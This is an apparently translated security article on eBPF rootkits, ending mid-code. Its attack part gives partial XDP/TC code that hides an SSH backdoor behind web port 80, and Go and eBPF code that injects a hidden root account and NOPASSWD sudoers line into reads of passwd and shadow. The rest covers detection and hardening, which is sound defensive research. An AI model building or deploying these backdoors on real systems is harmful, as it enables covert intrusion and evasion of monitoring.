Preface
In recent years the cloud-native field has grown rapidly, and K8s has become a widely recognized cloud operating system. Frequent container deployment, short container life cycles, and complex network routing bring new challenges to kernel security. The kernel faces ever-growing complexity, and it is extremely difficult to meet new demands for performance and scalability while still guaranteeing stability and availability. eBPF emerged against this background: it preserves kernel stability while requiring only small subsystem changes, and it supports dynamic loading at runtime, so business logic can be loaded into the kernel and hot-updated on the fly.
eBPF grew out of BPF, the Berkeley Packet Filter, which Steven McCanne and Van Jacobson proposed in 1992. BPF was introduced into Linux kernel 2.1 in 1997, gained a just-in-time compiler in kernel 3.0, and was applied to network filtering; the widely used tcpdump and libpcap are built on it. In 2014 Alexei Starovoitov implemented eBPF and exposed it to user space, which made it far more powerful. In Linux kernel 4.x, eBPF was extended to event types such as kernel functions, user-space functions, tracepoints, performance events (perf_events), and security controls. In recent years the rapid development of cloud native has also made eBPF flourish: Microsoft, Google, Facebook, and other companies founded the eBPF Foundation, and Cilium released networking products built on eBPF. However, while eBPF drives the rapid development of new business, it also brings security threats.
Analysis of the Current Situation
From both overseas and domestic sources we can see that, while eBPF solves many technical problems, it has also been maliciously exploited by illicit organizations.
Overseas Information
Black Hat
At Black Hat 2021, Datadog engineer Guillaume Fournier gave a talk titled "With Friends Like eBPF, Who Needs Enemies?". He described how eBPF can be maliciously exploited, including how to build and use a rootkit, and published the detection and defense code on GitHub.
DEFCON
At DEF CON 29, security researcher Pat Hogan also shared cases of eBPF being maliciously exploited in "Warping Reality - creating and countering the next generation of Linux rootkits using eBPF". The talk describes application scenarios for an eBPF rootkit, including network and runtime scenarios, as well as how to detect malicious use of eBPF. The code is also available on GitHub.
Domestic Information
Compared with overseas, there is little material in China about the malicious use of eBPF, and little sharing of the related techniques. It is possible that this risk has not yet caught the attention of domestic security practitioners. If this continues, it will inevitably hold back domestic companies as they build their cyber security defense systems, leaving security protection behind that of other countries and bringing greater risk to corporate and even national security. As a builder of defense systems, the Meituan information security team has a responsibility to promote a better understanding of this kind of malicious exploitation, to share Meituan's experience in detection and defense, and to harden cyber security products, in the hope of contributing to the development of domestic information security.
Attack Principles for Malicious Exploitation of eBPF Technology
Know yourself and know your enemy, and you will never be defeated in a hundred battles. To defend well, you must understand how the attack works. Let's first look at how an eBPF rootkit is designed. In terms of functionality, eBPF covers the following areas:
- Networking
- Monitoring
- Observability
- Tracing & performance analysis
- Security
In the networking field, cloud-native companies such as Cilium have built many network-layer products that implement mesh management together with the corresponding network-level security policies. They perform particularly well in network orchestration, where they are gradually replacing iptables and similar tools and tending to dominate the market. There are also many products in areas such as monitoring and observability. In runtime security in particular, Datadog, Falco, Google, and other companies have launched corresponding products. Interested readers can refer to the related source code analyses ("Cilium eBPF implementation mechanism source code analysis" and "Analysis of Datadog's eBPF security detection mechanism").
We review the hook points of the eBPF technology:
As the figure shows, eBPF hook points can be placed in the following locations:
- Between the kernel and subsystems such as storage and network;
- Between functional modules inside the kernel;
- Between kernel space and user space;
- And even inside the address space of user-space processes.
eBPF functionality covers XDP, TC, probes, sockets, and more. Every one of these hook points allows tampering from kernel space, which leaves user space completely blind; even a kernel-module-based HIDS cannot perceive these behaviors.
From the perspective of business scenarios, eBPF's networking, monitoring, and observability functions drive product development in the cloud-native field, and its tracing/performance analysis and security functions accelerate the evolution of security defense and auditing products. Malicious exploitation of these same functions will also become a direction that hackers pay attention to. This article discusses these new threats and the ideas for defending against them.
Following the stages of the data flow, this article splits malicious exploitation into two parts, discussing the exploitation, its hazards, and the defense ideas in turn:
- Linux Network Layer Malicious Exploitation
- Linux Runtime Malicious Exploitation
Linux Network Layer Malicious Exploitation
Take a server running SSH and Web services as an example. Under a common IDC network access policy, the public Web port 80 is open to any source IP, while the SSH service is open only to specific IPs or only on an intranet port.
Suppose this server has been compromised and the attacker wants to leave a backdoor, which needs a hidden, reliable network link as its channel. How could this be accomplished with eBPF?
Modifying TCP Packets at the XDP/TC Layer
To hide the backdoor better, it is best not to start a process or listen on a port (this part discusses only network-layer hiding). eBPF programs at kernel-level hooks such as XDP, TC, and sockets can modify traffic; these functions are often used for L3/L4 network load balancing. Cilium, for example, implements its network data path with eBPF at such hooks. An eBPF program hooked at the XDP point can change the destination IP of a TCP packet, and the kernel then forwards the packet.
To choose the hook points more precisely, consider where XDP and TC handle ingress and egress traffic in the Linux kernel:
- XDP's BPF_PROG_TYPE_XDP program type can drop, modify, and retransmit ingress traffic, but it cannot act on egress.
- TC's BPF_PROG_TYPE_SCHED_CLS has the capabilities of XDP's BPF_PROG_TYPE_XDP and can also act on egress.
The former is most commonly used for network firewalls and traffic scrubbing, where it is far more efficient than traditional firewalls. The latter is commonly used in cloud-native scenarios for container and Pod network monitoring, security access control, and so on. In this example both inbound and outbound traffic must be adjusted, so both hook points are needed. In addition, because the packet logic is handled at hooks as early as XDP, the communication packets are better hidden and are hard to catch with tools such as tcpdump.
Control Link
In the backdoor scenario, the same hook can rewrite the destination port from 80 (the Nginx Web service) to 22 (SSHD), much as eBPF-based load balancing does. This passes the network data through transparently and bypasses firewalls and network access restrictions.
Authentication Key
Because the backdoor rootkit works at the XDP/TC layer, the authentication key should, for simplicity, use only link-layer, network-layer, and transport-layer data, that is, MAC information, the IP five-tuple, and the like. The IP address changes frequently, whereas the MAC address is very likely unique; adding a fixed client port makes the combination even more distinctive, so together they can serve as the rootkit's authentication key (the client must specify its own TCP source port when initiating the connection).
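The matching rule described above (a fixed source MAC plus a fixed client TCP source port) can be sketched in plain user-space C. This is only a model for reasoning about which header fields such a rootkit would inspect; the struct `backdoor_key`, the function `key_matches`, and any sample values are hypothetical and do not come from the original demo.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define MAC_LEN 6

/* Hypothetical key: a fixed client MAC plus a fixed TCP source port
 * (host byte order). */
struct backdoor_key {
    uint8_t  mac[MAC_LEN];
    uint16_t src_port;
};

/* Returns 1 when both the source MAC and the TCP source port of a packet
 * equal the configured key, 0 otherwise. The IP address is deliberately
 * ignored because, as the text notes, it changes frequently. */
int key_matches(const struct backdoor_key *key,
                const uint8_t src_mac[MAC_LEN], uint16_t src_port)
{
    assert(key != NULL && src_mac != NULL);
    if (memcmp(key->mac, src_mac, MAC_LEN) != 0)
        return 0;
    return key->src_port == src_port;
}
```

From a defender's point of view, the same comparison explains why such traffic is hard to spot: nothing in the payload is unusual, only the combination of two ordinary header fields.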
Linking eBPF uprobe with eBPF Map
eBPF is also well suited to updating the backdoor rootkit's key. In the Nginx scenario, for example, a uprobe hooks the HTTP handling function to obtain a specific string from a URL parameter and saves it into an eBPF map, which completes the key update.
When the eBPF rootkit runs at the XDP/TC layer, it reads the key from the eBPF map and compares it.
Implementation
Here's an example of how XDP handles ingress:
SEC("xdp/ingress")
int xdp_ingress(struct xdp_md *ctx) {
    struct cursor c;
    struct pkt_ctx_t pkt;

    // Check whether this is the SSHD protocol; if not, pass the packet through.
    // is_sshd_protocol() is a placeholder for the parsing logic elided in the original.
    if (!is_sshd_protocol(ctx, &c, &pkt)) {
        return XDP_PASS;
    }

    // Check whether the rootkit key matches: the NIC (MAC) information and
    // the source port are compared with the configuration read from the bpf map.
    // key_matches() is a placeholder for the comparison elided in the original.
    if (!key_matches(&pkt)) {
        return XDP_PASS;
    }

    // Read the map to see if the client already exists.
    struct netinfo client_key = {};
    __builtin_memcpy(&client_key.mac, &pkt.eth->h_source, ETH_ALEN);
    struct netinfo *client_value;
    client_value = bpf_map_lookup_elem(&ingress_client, &client_key);

    // If no disguise entry is found, assemble one and store it.
    if (!client_value) {
        struct netinfo new_value = {};
        bpf_map_update_elem(&ingress_client, &client_key, &new_value, BPF_ANY);
    }

    // Disguise the source MAC as a LAN MAC.
    pkt.eth->h_source[0] = 0x00;
    ...

    // Replace the source IP with the disguise, leaving the client port unchanged.
    // Change the destination port.
    pkt.tcp->dest = htons(FACK_PORT); // 22

    // Recalculate the layer-4 TCP checksum.
    ipv4_csum(pkt.tcp, sizeof(struct tcphdr), &csum);
    pkt.tcp->check = csum;

    // Write the disguise to the map so that TC can restore the original
    // MAC and IP information on egress.
    return XDP_PASS;
}
With a relatively simple demo like this, TCP packets can be disguised on the ingress side. Similarly, when the TC layer handles packets in the egress direction, it only needs to restore the original information of the disguised packet. The whole process is shown in the following figure:
In this way, the rootkit's communication link does not affect normal user access, and no changes are made to the original system, making it particularly well hidden.
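The listing recomputes the TCP checksum after rewriting the destination port. One common alternative, shown here only as a sketch and not as the demo's own method, is the incremental update from RFC 1624, which adjusts the existing checksum for a single changed 16-bit field. The function names `csum_full` and `csum_update16` are hypothetical, and the buffer in the usage note is made-up data rather than a real TCP segment.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Full Internet checksum (RFC 1071) over big-endian 16-bit words.
 * len must be even in this sketch. */
uint16_t csum_full(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    assert(data != NULL && len % 2 == 0);
    for (size_t i = 0; i < len; i += 2)
        sum += (uint32_t)((data[i] << 8) | data[i + 1]);
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Incremental update (RFC 1624, eqn. 3): HC' = ~(~HC + ~m + m'),
 * used when one 16-bit field changes from old_val to new_val. */
uint16_t csum_update16(uint16_t check, uint16_t old_val, uint16_t new_val)
{
    uint32_t sum = (uint16_t)~check;
    sum += (uint16_t)~old_val;
    sum += new_val;
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}
```

For example, changing a port field from 80 to 22 and calling `csum_update16(old_check, 80, 22)` gives the same value as recomputing `csum_full` over the modified buffer, without touching the rest of the packet.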
Video Demonstration
We prepared three hosts for testing:
- Intruder: cnxct-mt2 with IP 172.16.71.1.
- Regular user: ubuntu with IP 172.16.71.3.
- Compromised server: vm-ubuntu with IP 172.16.71.4. It opens Nginx Web port 80 and SSHD port 22, with an iptables rule that allows only intranet IPs to access SSHD.
Hazards
This rootkit does not actively create sockets; it piggybacks on packets the system is already sending to deliver messages to the backdoor user. To the system this is just a small, insignificant network response, which is practically impossible to pick out among thousands of HTTP packets.
- iptables firewall bypass: the publicly open port 80 is used as the communication tunnel;
- WebIDS bypass: after the traffic reaches the server, it is never passed to Nginx;
- NIDS bypass: the intruder's traffic looks normal as it flows across the LAN, and it simply cannot be decrypted;
- HIDS bypass: does the HIDS trust the firewall and ignore SSHD logins from local/LAN sources?
Linux Runtime Malicious Exploitation
In the cloud-native ecosystem, a large number of cluster network management plug-ins built on eBPF have emerged, such as Calico and Cilium. These network management services are deployed as containers, and the containers must be granted CAP_SYS_ADMIN (or CAP_BPF on newer kernels) to make eBPF system calls. The environment these services run in therefore leaves attackers plenty of room to operate.
Implementation
Recall eBPF's hook points: kprobe and tracepoint event types on syscalls are frightening when used in a backdoor rootkit. They can, for example, modify the data the kernel returns to user space, or intercept and block user-space behavior, essentially at will. Worse, common HIDS products monitor behavior from kernel space or user space, and eBPF sidesteps most of that monitoring without generating any logs, which is chilling to think about.
Tracepoint Event Type Hook
When a user logs in, SSHD reads files such as /etc/passwd. The user-space SSHD program invokes system calls such as open and read, and the kernel retrieves the data from disk and returns it to the SSHD process.
Generating the Payload in User Space
User space generates the payloads for files such as /etc/passwd and /etc/shadow, and replaces the corresponding field values in the ELF .rodata section through eBPF's RewriteConstants mechanism.
import (
	"fmt"

	"github.com/GehirnInc/crypt/sha512_crypt" // assumed source of sha512_crypt
	manager "github.com/ehids/ebpfmanager"
)

// Pass data to the eBPF program by rewriting ELF constants.
func (e *MBPFContainerEscape) constantEditor() []manager.ConstantEditor {
	var username = RandString(9)
	var password = RandString(9)
	var s = RandString(8)

	salt := []byte(fmt.Sprintf("$6$%s", s))
	// Use the salt to hash the generated password.
	c := sha512_crypt.New()
	hash, err := c.Generate([]byte(password), salt)
	if err != nil {
		return nil
	}

	var m = map[string]interface{}{}
	res := make([]byte, PAYLOAD_LEN)
	var payload = fmt.Sprintf("%s ALL=(ALL:ALL) NOPASSWD:ALL #", username)
	copy(res, payload)
	m["payload"] = res
	m["payload_len"] = uint32(len(payload))

	// Generate the passwd line.
	var payload_passwd = fmt.Sprintf("%s:x:0:0:root:/root:/bin/bash\n", username)
	// Generate the shadow line.
	var payload_shadow = fmt.Sprintf("%s:%s:18982:0:99999:7:::\n", username, hash)
	// The original listing does not show how these two lines are passed on;
	// they are stored here only so that the variables are used.
	m["payload_passwd"] = payload_passwd
	m["payload_shadow"] = payload_shadow

	// eBPF RewriteConstants
	var editor = []manager.ConstantEditor{
		{
			Name:          "payload",
			Value:         m["payload"],
			FailOnMissing: true,
		},
		{
			Name:          "payload_len",
			Value:         m["payload_len"],
			FailOnMissing: true,
		},
	}
	return editor
}

func (this *MBPFContainerEscape) setupManagers() {
	this.bpfManager = &manager.Manager{
		Probes: []*manager.Probe{
			{
				Section:          "tracepoint/syscalls/sys_enter_openat",
				EbpfFuncName:     "handle_openat_enter",
				AttachToFuncName: "sys_enter_openat",
			},
			...
		},
		Maps: []*manager.Map{
			{
				Name: "events",
			},
		},
	}
	this.bpfManagerOptions = manager.Options{
		...
		// Fill in the constants used by RewriteConstants.
		ConstantEditors: this.constantEditor(),
	}
}
Using the Payload in Kernel Space
const volatile int payload_len = 0;
...
const volatile char payload_shadow[MAX_PAYLOAD_LEN];

SEC("tracepoint/syscalls/sys_exit_read")
int handle_read_exit(struct trace_event_raw_sys_exit *ctx)
{
    // Determine whether this read is a rootkit target and whether the payload needs to be loaded.
    ...
    long int read_size = ctx->ret;
    // Do nothing if the original buffer is shorter than the payload.
    if (read_size < payload_len) {
        return 0;
    }
    // Check the file type and apply the matching payload.
    switch (pbuff_addr->file_type)
    {
    case FILE_TYPE_PASSWD:
        // Overwrite the buffer with the payload and pad the remainder with spaces.
        {
            bpf_probe_read(&local_buff, MAX_PAYLOAD_LEN, (void*)buff_addr);
            for (unsigned int i = 0; i < MAX_PAYLOAD_LEN; i++) {
                if (i >= payload_passwd_len) {
                    local_buff[i] = ' ';
                }
                else {
                    local_buff[i] = payload_passwd[i];
                }
            }
        }
        break;
    case FILE_TYPE_SHADOW:
        // Overwrite the shadow file content.
        ...
        break;
    case FILE_TYPE_SUDOERS:
        // Overwrite the sudoers content.
        ...
        break;
    default:
        return 0;
    }
    // Write the payload back to the user-space buffer.
    ret = bpf_probe_write_user((void*)buff_addr, local_buff, MAX_PAYLOAD_LEN);
    // Send events to user space.
    return 0;
}
With the demo rootkit designed above, a root account with a random username and password is added. For authentication, it can also be combined with the network-layer demo described earlier, using eBPF map interaction to implement the corresponding authentication. The rootkit itself never changes files on disk and does not produce risky behavior. Moreover, it targets only specific processes, which makes it even stealthier. The whole process is shown in the figure below:
It works the same way on a physical machine or in a container that has been given root and BPF permissions.
Serious Hazards
In cloud-native scenarios, many containers are granted SYS_ADMIN privileges. Combined with a vulnerability such as the recent Java log4j one, an attacker can break straight out of the container and obtain host privileges. Isn't that frightening?
It gets worse: this rootkit generates no logs of user-space behavior, changes no files, and leaves no information about the added user anywhere in the system. The entire backdoor produces no data, which disables most HIDS.
Summary
The two scenarios demonstrated in this article should make the harm of maliciously exploited eBPF clear. In fact, they are only the tip of the iceberg: kprobe and uprobe offer many more capabilities, such as hiding processes and scanning the intranet without a trace. For more related malicious exploits, see the article "Bad BPF - Warping reality using eBPF".
If an intruder designs the rootkit carefully, adding process hiding and similar features to make it stealthier, the ideas in this article are enough to build a "ghost-like" backdoor, which is a frightening thought.
Conventional host security products generally use Netlink, Linux kernel modules, and similar technologies to perceive process creation, network communication, and other behaviors. eBPF hook points can sit deeper than these technologies and run earlier than they do, which means a conventional HIDS cannot perceive or discover them.
A traditional rootkit hooks APIs by replacing the original function, which changes the function's call address, and mature detection mechanisms exist for this. An eBPF hook is different: the function call stack is unchanged, which makes detection much harder.
So how do we detect and defend against such backdoors?
Detection and defense
In terms of the course of events, there are three stages:
- Before running
- At runtime
- After running
Before Running
Before a malicious program runs, the guiding idea is, as always, to reduce the attack surface.
Environmental constraints
On both hosts and containers, tighten permissions: do not grant SYS_ADMIN, CAP_BPF, or similar permissions unless they are really needed. If such a permission must be granted, the risk can only be handled in the runtime detection stage.
seccomp restrictions
When starting a container, modify the default seccomp.json to disable the bpf system call and prevent container escape. Note that this method does not work for privileged containers.
Kernel compilation parameter restrictions
Modifying a function's return value for runtime protection requires bpf_override_return, which in turn requires the kernel to be built with CONFIG_BPF_KPROBE_OVERRIDE. Do not enable this compilation parameter except in special circumstances.
Unprivileged user restrictions
Most eBPF program types can be loaded only by a user with root privileges. A few exceptions, such as BPF_PROG_TYPE_SOCKET_FILTER and BPF_PROG_TYPE_CGROUP_SKB, do not require root, but whether they are allowed depends on a system configuration switch.
// https://elixir.bootlin.com/linux/v5.16.9/source/kernel/bpf/syscall.c#L2240
if (type != BPF_PROG_TYPE_SOCKET_FILTER &&
    type != BPF_PROG_TYPE_CGROUP_SKB &&
    !bpf_capable())
    return -EPERM;
Checking the Switch
The switch is /proc/sys/kernel/unprivileged_bpf_disabled, and it can be changed by running sysctl kernel.unprivileged_bpf_disabled=1. The meaning of each value is given in "Documentation for /proc/sys/kernel/":
- 0 allows unprivileged users to call bpf;
- 1 prohibits unprivileged users from calling bpf, and the value cannot be changed again until the system is rebooted;
- 2 prohibits unprivileged users from calling bpf, but the value can later be changed to 0 or 1.
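How the program-type exemption and the switch combine can be modeled in a few lines of user-space C. This is a simplified sketch, not the kernel's code: the enum `prog_type_model` and the function `may_load_prog` are hypothetical names, the enum values are illustrative rather than taken from <linux/bpf.h>, and real kernels apply further checks that are not modeled here.

```c
#include <assert.h>
#include <errno.h>
#include <stdbool.h>

/* Local stand-ins for a few program types; the numeric values are
 * illustrative only. */
enum prog_type_model {
    PROG_SOCKET_FILTER,
    PROG_CGROUP_SKB,
    PROG_KPROBE,
    PROG_XDP,
};

/* Simplified model of the load-time gate:
 *  - a caller with the BPF capability passes this check;
 *  - with the switch at 1 or 2, unprivileged callers are rejected;
 *  - with the switch at 0, unprivileged callers may load only the two
 *    exempt program types.
 * Returns 0 when loading may proceed, -EPERM otherwise. */
int may_load_prog(enum prog_type_model type, bool has_bpf_cap,
                  int unprivileged_bpf_disabled)
{
    assert(unprivileged_bpf_disabled >= 0 && unprivileged_bpf_disabled <= 2);
    if (has_bpf_cap)
        return 0;
    if (unprivileged_bpf_disabled != 0)
        return -EPERM;
    if (type != PROG_SOCKET_FILTER && type != PROG_CGROUP_SKB)
        return -EPERM;
    return 0;
}
```

Under this model, setting the switch to 1 or 2 closes the only path by which an unprivileged process could load a BPF program, which is why it is a sensible default on hosts with no such requirement.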
Signature restrictions
It has been proposed that the kernel verify signatures when loading BPF bytecode, so that only securely signed BPF bytecode can be loaded. lwn.net covers this topic in "BPF Bytecode Signature Scheme".
However, many people raised objections. They argue that the BPF subsystem has become too abstract and complex in recent years and do not want extra features that would make BPF less stable. The idea therefore shifted from signing the bytecode at load time to signing the user-space program that loads the BPF bytecode, which relies on an existing kernel feature and adds no complexity to the system.
This article believes that this does mitigate most BPF bytecode loading problems. However, loading through native system commands (tc, ip, bpftool, and so on) still poses a threat, for example: ip link set dev ens33 xdp obj xdp-example_pass.o.
Operational checks
Most eBPF programs no longer exist after a reboot, so intruders will try to make the backdoor start automatically. Carefully check the Linux system's startup items, crontab, and other scheduled tasks.
The user-space loader can take various forms: both ELF executables and ELF shared objects (.so dynamic link libraries) are possible. Either way, it must invoke the bpf syscall to load BPF bytecode at execution time, so checking only executable ELF files is not accurate enough.
At Runtime
Monitoring
Every program running on a Linux system has to make system calls, and eBPF programs are no exception: they must invoke the bpf system call (SYS_BPF, number 321 on x86_64). All eBPF program loading and map creation goes through this syscall, so intercepting and monitoring this mandatory path is the best approach.
SEC("tracepoint/syscalls/sys_enter_bpf")
int tracepoint_sys_enter_bpf(struct syscall_bpf_args *args) {
    struct bpf_context_t *bpf_context = make_event();
    if (!bpf_context)
        return 0;
    bpf_context->cmd = args->cmd;
    get_common_proc(&bpf_context->procinfo);
    send_event(args, bpf_context);
    return 0;
}
Our open-source ehids project includes a BPF syscall detection example, which you can fork to explore. The repository address is GitHub/ehids.
The careful reader may wonder what happens if the intruder's backdoor runs earlier and spoofs this system call. This is a very good question, and it is discussed in the post-run tracing chapter. In most scenarios, however, the HIDS product can still start first.
Audit & Screening
Above we discussed monitoring invocations of the bpf system call. In cloud-native scenarios, eBPF-based network products invoke it frequently and generate a large number of event logs, which puts more pressure on operations staff. Streamlining and precisely screening these behaviors therefore becomes our next goal.
Screening based on program whitelisting
Data filtering is one answer to the pressure of large data volumes. On business servers that run BPF applications, normal business behavior itself generates many calls, which increases the auditing burden of security alerts. For known processes, we can filter on process characteristics.
Obtain the current process's pid, comm, and other attributes, and decide whether to report or intercept according to the configuration that user space writes into an eBPF map. Filtering can also be done in user space, but kernel space is more efficient, and interception must be implemented in kernel space.
You can refer to the design of saBPF, which implements hook programs at LSM hook points with eBPF to perform the associated audit calls. Although the GitHub/saBPF-project code is still only a demo, its ideas are worth borrowing.
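The allowlist decision described above can be sketched as a user-space C function. It is a minimal model under stated assumptions: the function `should_report` is hypothetical, and in a real deployment the allowlist would live in an eBPF map and the comparison would run in kernel space.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define COMM_LEN 16  /* the kernel's task comm field holds 15 chars plus NUL */

/* Returns 1 when an event from process name `comm` should be reported,
 * 0 when the name is on the allowlist and the event can be dropped. */
int should_report(const char *comm, const char *const allowlist[], size_t n)
{
    assert(comm != NULL && allowlist != NULL);
    for (size_t i = 0; i < n; i++) {
        if (strncmp(comm, allowlist[i], COMM_LEN) == 0)
            return 0;
    }
    return 1;
}
```

A process name is easy to forge, so a filter like this is best combined with other attributes mentioned in the text, such as the pid, before an event is discarded.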
Filter by SYSCALL type
The bpf syscall has many subcommands covering map, prog, and other types of operations (see the bpf() subcommand reference). In real business scenarios, "write" operations carry a higher security risk than "read" operations, so we can filter out "read" operations and report and audit only "write" operations.
For example:
- MAP creation BPF_MAP_CREATE
- PROG load BPF_PROG_LOAD
- BPF_OBJ_PIN
- BPF_PROG_ATTACH
- BPF_BTF_LOAD
- BPF_MAP_UPDATE_BATCH
This is especially useful in business scenarios that legitimately require BPF, where it makes log auditing much more manageable.
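The "write"-only filter can be sketched as a small classifier over the bpf() subcommand number. The enum below is a local, hypothetical mirror of part of `enum bpf_cmd`; its numeric values are believed to match the kernel UAPI header but should be verified against <linux/bpf.h> on the target kernel before being relied on.

```c
#include <assert.h>
#include <stdbool.h>

/* Partial local mirror of enum bpf_cmd (values are an assumption to be
 * checked against <linux/bpf.h>). */
enum bpf_cmd_model {
    CMD_MAP_CREATE       = 0,
    CMD_MAP_LOOKUP_ELEM  = 1,
    CMD_PROG_LOAD        = 5,
    CMD_OBJ_PIN          = 6,
    CMD_OBJ_GET          = 7,
    CMD_PROG_ATTACH      = 8,
    CMD_BTF_LOAD         = 18,
    CMD_MAP_UPDATE_BATCH = 26,
};

/* Returns true for the "write" subcommands listed in the text, which
 * should be reported and audited; everything else is treated as "read". */
bool is_write_cmd(int cmd)
{
    assert(cmd >= 0);
    switch (cmd) {
    case CMD_MAP_CREATE:
    case CMD_PROG_LOAD:
    case CMD_OBJ_PIN:
    case CMD_PROG_ATTACH:
    case CMD_BTF_LOAD:
    case CMD_MAP_UPDATE_BATCH:
        return true;
    default:
        return false;
    }
}
```

Treating unknown commands as "read" keeps the sketch short; a stricter policy could report any command that is not explicitly known to be read-only.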
After Running
A few questions arise here. Once an eBPF user-space program has loaded BPF bytecode into the kernel, can it exit? After it exits, do the BPF functions hooked in the kernel still work? Do the maps it created still exist? And which approach would a backdoor choose to ensure better stealth?
To answer these questions, we need to look at how BPF programs are loaded and at the life cycle of BPF objects.
File Descriptors and Reference Counters
A user-space program accesses BPF objects (progs, maps, debugging information) through file descriptors (FDs), and each object has a reference counter. When user space opens or reads the corresponding FD, the counter increases; when the FD is closed, the counter decreases. When refcnt reaches 0, the kernel releases the BPF object, and it stops working.
In a security scenario, this means that if the user-space backdoor process exits, the backdoor eBPF program exits with it. This is a useful property for security checks: look for suspicious processes in the process list.
However, not all BPF objects go away when the user-space process exits. By the kernel's rules, a BPF object stays alive, and the backdoor keeps working, as long as refcnt is greater than 0. In fact, hooks such as XDP, TC, and the CGROUP-based hooks are global and do not go away when the user-space process exits: the kernel itself maintains the corresponding FD, so refcnt never drops to zero and the program continues to work.
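The reference-counting rule above can be illustrated with a toy model in C. It is not kernel code: `struct bpf_obj_model`, `obj_get`, and `obj_put` are hypothetical names that only mimic "take a reference" and "drop a reference".

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Toy model of a BPF object: it is freed when refcnt drops to zero. */
struct bpf_obj_model {
    int  refcnt;
    bool freed;
};

/* Take a reference (an FD is opened, or the kernel attaches the object). */
void obj_get(struct bpf_obj_model *o)
{
    assert(o != NULL && !o->freed);
    o->refcnt++;
}

/* Drop a reference (an FD is closed, or the loader process exits). */
void obj_put(struct bpf_obj_model *o)
{
    assert(o != NULL && o->refcnt > 0);
    if (--o->refcnt == 0)
        o->freed = true;
}
```

In this model a kprobe-style program held only by its loader's FD is freed as soon as the loader exits, while an XDP-style program that the NIC also references survives with refcnt 1, which matches the two life cycles discussed in this article.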
Tracing the Source
Security engineers often need different tracing strategies for different scenarios. The tracing methods given in this article all rely on eBPF's own interfaces, which means that if the malicious program ran earlier than the checking tool, the results may have been forged.
Short Life Cycle
Representative BPF program types:
- k[ret]probe
- u[ret]probe
- tracepoint
- raw_tracepoint
- perf_event
- socket filters
- so_reuseport
These types are managed through FDs, and the kernel cleans them up automatically, which is better for system stability. During troubleshooting, a backdoor of these program types shows up clearly as a user-space process, and it can be found in the list of BPF programs running on the system.
bpftool tool
List of eBPF programs
Run the command bpftool prog show; see bpftool prog help for more parameters.
The result shows the BPF programs currently running on the system, the IDs of the associated BPF maps, and the corresponding process information. Careful readers may also notice that the XDP entries in the result carry no process ID information; this is discussed later.
eBPF map list
Run the command bpftool map show; see bpftool map help for more parameters.
The map information can be cross-checked against the program information. The data in a map can also be exported to help identify malicious process behavior, as discussed in the "Forensics" section.
bpflist-bpfcc
The bpflist-bpfcc -vv command shows a list of "some" of the BPF programs currently running on the server. Take a test environment as an example:
root@vmubuntu:/home/cfc4n/project/xdp# bpflist-bpfcc -vv
open kprobes:
open uprobes:
PID COMM TYPE COUNT
1 systemd prog 8
10444 ehids map 4
10444 ehids prog 5
As shown, the system process systemd has 8 progs loaded, and the ehids process has created 4 eBPF maps and 5 progs. In fact, the command ip link set dev ens33 xdp obj xdp-example_pass.o had also been executed beforehand, yet it does not appear here. This means that the output of this command does not cover all BPF programs and maps.
Long Life Cycle
Representative BPF program types:
- XDP
- TC
- LWT
- CGROUP
In the scenario above, where BPF bytecode is loaded with the ip command, the BPF tools often cannot find the program or show incomplete information. The reason lies in how loading works.
How the ip Command Loads BPF
The life cycle of BPF objects is managed with reference counters, a general rule that all BPF objects follow. For long-life-cycle program types, the user-space control program passes the FD to kernel space as a parameter, and kernel space maintains it from then on.
Take the previously mentioned command ip link set dev ens33 xdp obj xdp-example_pass.o as an example. The ip command's arguments include the name of the BPF bytecode file. The ip process opens an FD for the .o bytecode and sends a message of type IFLA_XDP (subtype IFLA_XDP_FD) to the kernel over NETLINK. The kernel calls the dev_change_xdp_fd function, the NIC takes over the FD, and the reference counter is incremented. The user-space ip process then exits, and the BPF program keeps working. For the kernel source code, see elixir.bootlin.com/linux.
We captured the message sent by the ip program to verify how it associates an XDP program with the NIC:
17:53:22.553708 sendmsg(3, {
    msg_name={sa_family=AF_NETLINK, nl_pid=0, nl_groups=00000000},
    msg_namelen=12,
    msg_iov=[
        {
            iov_base={
                {nlmsg_len=52, nlmsg_type=RTM_NEWLINK, nlmsg_flags=NLM_F_REQUEST|NLM_F_ACK, nlmsg_seq=1642672403, nlmsg_pid=0},
                {ifi_family=AF_UNSPEC, ifi_type=ARPHRD_NETROM, ifi_index=if_nametoindex("ens33"), ifi_flags=0, ifi_change=0},
                {
                    {nla_len=20, nla_type=IFLA_XDP},
                    [
                        {{nla_len=8, nla_type=IFLA_XDP_FD}, 6},
                        {{nla_len=8, nla_type=IFLA_XDP_FLAGS}, XDP_FLAGS_UPDATE_IF_NOEXIST}
                    ]
                }
            },
            iov_len=52
        }
    ],
    msg_iovlen=1,
    msg_controllen=0,
    msg_flags=0
}, 0) = 52
You can see that the FD parameter after IFLA_XDP_FD is 6. Similarly, deleting the XDP program requires setting the FD to -1, which corresponds to the following NETLINK message:
17:55:16.306843 sendmsg(3, {
    ...
    {
        {nla_len=20, nla_type=IFLA_XDP},
        [
            {{nla_len=8, nla_type=IFLA_XDP_FD}, -1},
            {{nla_len=8, nla_type=IFLA_XDP_FLAGS}, XDP_FLAGS_UPDATE_IF_NOEXIST}
        ]
    }
    ...
}, 0) = 52
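The lengths in these traces (nla_len=8, nla_len=20, nlmsg_len=52) follow from netlink's fixed-size headers, and a short C sketch can reproduce them. Everything here is an illustrative assumption: the `*_model` structs are local mirrors of the kernel structures, the attribute type constants are believed to match <linux/if_link.h> but are not verified here, and the function names are hypothetical. The sketch only builds bytes in memory and sends nothing.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Local mirrors of the fixed-size netlink headers (16, 16 and 4 bytes). */
struct nlmsghdr_model  { uint32_t len; uint16_t type; uint16_t flags; uint32_t seq; uint32_t pid; };
struct ifinfomsg_model { uint8_t family; uint8_t pad; uint16_t type; int32_t index; uint32_t flags; uint32_t change; };
struct nlattr_model    { uint16_t nla_len; uint16_t nla_type; };

/* Attribute type numbers: assumptions to be checked against <linux/if_link.h>. */
enum { ATTR_IFLA_XDP = 43, ATTR_IFLA_XDP_FD = 1, ATTR_IFLA_XDP_FLAGS = 3 };

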